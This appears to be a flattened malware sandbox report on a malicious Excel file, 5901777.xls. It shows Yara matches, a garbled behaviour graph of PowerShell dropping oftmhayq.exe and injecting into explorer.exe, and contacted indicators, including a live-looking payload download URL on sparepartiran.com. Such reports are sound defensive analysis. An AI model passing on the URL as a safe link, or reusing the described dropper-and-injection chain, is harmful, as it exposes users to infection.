Source: Yara match File source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 323692 Sample: 5901777.xls Startdate: 27/11/2020 Architecture: WINDOWS Score: 100 45 Multi AV Scanner detection for domain / URL 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for dropped file 2->49 51 12 other signatures 2->51 9 powershell.exe 14 21 2->9         started        14 powershell.exe 21 2->14         started        16 EXCEL.EXE 27 22 2->16         started        process3 dnsIp4 43 sparepartiran.com 162.223.88.131, 49743, 49744, 80 COLOUPUS United States 9->43 41 C:\Users\Public\oftmhayq.exe, PE32 9->41 dropped 61 Drops PE files to the user root directory 9->61 63 Powershell drops PE file 9->63 18 oftmhayq.exe 4 9->18         started        21 conhost.exe 9->21         started        23 oftmhayq.exe 1 5 14->23         started        26 conhost.exe 14->26         started        28 splwow64.exe 16->28         started        file5 signatures6 process7 file8 53 Antivirus detection for dropped file 18->53 55 Machine Learning detection for dropped file 18->55 57 Tries to detect virtualization through RDTSC time measurements 18->57 30 oftmhayq.exe 18->30         started        39 C:\Users\user\AppData\Roaming\...\vlc.exe, PE32 23->39 dropped 59 Injects a PE file into a foreign processes 23->59 33 oftmhayq.exe 23->33         started        signatures9 process10 signatures11 65 Modifies the context of a thread in another process (thread injection) 30->65 67 Maps a DLL or memory area into another process 30->67 69 Queues an APC in another process (thread injection) 30->69 35 explorer.exe 33->35 injected process12 process13 37 vlc.exe 35->37         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
162.223.88.131
 unknown United States
19084 COLOUPUS true

Contacted Domains

Name IP Active
sparepartiran.com 162.223.88.131 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://sparepartiran.com/js/2Q/5901777.pdf.exe true
  • Avira URL Cloud: safe
 unknown